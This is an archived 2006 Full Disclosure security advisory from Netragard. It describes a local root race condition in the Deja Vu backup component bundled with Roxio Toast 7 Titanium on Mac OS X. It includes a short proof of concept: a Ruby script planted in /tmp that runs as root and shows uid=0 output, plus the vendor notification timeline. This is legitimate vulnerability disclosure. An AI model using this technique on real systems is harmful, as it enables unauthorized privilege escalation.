Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos

Full Disclosure: [NETRAGARD-20060624 SECURITY ADVISORY] [ ROXIO TOAST 7 TITANIUM LOCAL ROOT COMPROMISE - DEJA VU RACE CONDITION]

[NETRAGARD-20060624 SECURITY ADVISORY] [ ROXIO TOAST 7 TITANIUM LOCAL ROOT COMPROMISE - DEJA VU RACE CONDITION]

From: Netragard Security Advisories <advisories_at_netragard.com>
Date: Mon, 11 Sep 2006 16:29:10 -0400

******************** Netragard, L.L.C Advisory* *******************
09/11/2006

                     Strategic Reconnaissance Team
              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."

[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems and Applications
commonly used by businesses internationally. We apply the knowledge
gained by performing this research to our professional security
services. This in turn enables us to produce high quality deliverables
that are the product of talented security professionals and not those
of automated scanners and tools. This advisory is the product of
research done by the Strategic Reconnaissance Team.

   [ For more information please visit http://www.netragard.com ]

[Advisory Information]
----------------------------------------------------------------------
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060624
Product Name : Roxio Toast
Product Version : 7 Titanium
Vendor Name : Sonic Solutions / Propaganda Productions
Type of Vulnerability : Local Root Compromise
Effort : Difficult, depends on timing.
Operating System : OSX
Other : Race Condition Explpoitation in Deja Vu which
                        is bundled into Roxio Toast. Deja Vu is the
                        product of Propaganda Productions.

Official Advisory URL:
----------------------------------------------------------------------
http://www.netragard.com/pdfs/research/ROXIO_RACE_NETRAGARD-20060624.txt

[Product Description]
----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."

--http://www.roxio.com--

[Technical Summary]
----------------------------------------------------------------------
Deja Vu, which is bundled with Roxio Toast 7, creates ruby scripts in
the /tmp directory. These scripts contain commands which are executed
with escilated privileges. A race condition exists which makes it
possible to execute arbritrary commands against the system or gain
root level access.

[Technical Details]
----------------------------------------------------------------------
This was tested using a configured version of Roxio Toast 7 Titanium.
(reproduction depends on timing)

######################################################################
#
# dejavu_manual.rb was created by user test
#
######################################################################
netragard-test> ls -al /tmp/dejavu_manual.rb
-rw-r--r-- 1 test wheel 32843 Jul 7 21:41 /tmp/dejavu_manual.rb

######################################################################
#
# The contents of dejavu_manual.rb
#
######################################################################
netragard-test>cat test.rb
#!/usr/bin/ruby
system '/usr/bin/id'

######################################################################
#
# 1) Open the System Preferences
# 2) Click on deja vu
# 3) Perform a manual backup.
# 4) Notice uid=0(root)
#
######################################################################
netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/
System\ Preferences

uid=0(root) gid=501(test) groups=501(test),
81(appserveradm), 79(appserverusr), 80(admin)

[Proof Of Concept]
----------------------------------------------------------------------
Demonstrated above.

[Vendor Status]
----------------------------------------------------------------------
Propaganda Productions was notified by Sonic Solutions on behalf of
Netragard, L.L.C. on August 10th 2006. As of today Netragard has not
received any response from Propaganda Productions.

[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

Regards,
    Netragard Strategic Reconnaissance Team
    advisories at netragard dot com
    http://www.netragard.com
    -------------------------
    "We make I.T. Secure"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Received on Sep 11 2006
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]